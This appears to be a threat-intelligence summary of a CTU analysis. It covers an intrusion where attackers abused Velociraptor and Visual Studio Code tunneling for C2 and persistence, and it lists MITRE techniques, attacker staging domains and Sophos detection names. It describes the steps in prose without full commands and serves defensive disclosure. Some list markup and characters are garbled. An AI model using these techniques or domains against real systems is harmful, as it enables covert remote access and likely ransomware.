CTU researchers analyzed an August 2025 intrusion where an attacker deployed legitimate Velociraptor DFIR tooling to stage and run Visual Studio Code with tunneling enabled, likely to create a tunnel to an attacker-controlled C2 and enable remote code execution. The incident used Cloudflare Workers staging domains to host installers and C2 (files.qaubctgg.workers.dev, velo.qaubctgg.workers.dev) and triggered a Taegis alert that enabled containment before likely ransomware deployment. #Velociraptor #VisualStudioCode
Keypoints
- Attackers used msiexec to download and install Velociraptor from a Cloudflare Workers staging domain (files.qaubctgg.workers.dev).
- Velociraptor was configured to communicate with the C2 at velo.qaubctgg.workers.dev.
- An encoded PowerShell command downloaded Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled.
- Visual Studio Code was installed as a service with output redirected to a log file to maintain persistence and enable remote access.
- Taegis detected the VS Code tunneling activity, prompting Sophos analysts to advise isolating the affected host and other remediations that prevented further attacker objectives.
- Analysis indicates the activity was likely a precursor to ransomware deployment; defenders should treat unauthorized DFIR or RMM tool use as high-risk.
- Sophos protections Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK detect related activity; recommended mitigations include EDR, monitoring unexpected tools, restricting access, and backups.
MITRE Techniques
- [T1071] Application Layer Protocol β Used Visual Studio Code tunneling to create a network channel to an attacker-controlled C2 (ββ¦the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server.β)
- [T1105] Ingress Tool Transfer β msiexec was used to download installers (v2.msi, sc.msi) from the Cloudflare Workers staging domain (ββ¦used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domainβ).
- [T1059.001] PowerShell β An encoded PowerShell command was used to download and execute Visual Studio Code (ββ¦used an encoded PowerShell command to download Visual Studio Code (code.exe) β¦ and executed it with the tunnel option enabled.β).
- [T1543.003] Create or Modify System Process: Windows Service β Visual Studio Code (code.exe) was installed as a service to maintain persistence (βThe threat actor installed code.exe as a service and redirected the output to a log file.β).
- [T1078] Valid Accounts / Use of Legitimate Tools β Abuse of legitimate Velociraptor DFIR tooling to pivot and minimize malicious payloads (ββ¦attackers pivoting to using incident response tools to gain a foothold in a network and minimize the amount of malware they deploy.β).
Indicators of Compromise
- [Domain ] Staging and C2 domains used to host installers and C2 β files.qaubctgg.workers.dev, velo.qaubctgg.workers.dev
<li=”[File name ] Downloaded installer and executable names observed β v2.msi (Velociraptor installer), sc.msi (additional malware), code.exe (Visual Studio Code binary)
<li=”[Tool/process ] Utilities and tools used in the intrusion β msiexec (used to download/install .msi files), encoded PowerShell command (used to download and execute code.exe)”
<li=”[Detection names ] Sophos detections for related activity β Troj/Agent-BLMR, Troj/BatDl-PL, Troj/Mdrop-KDK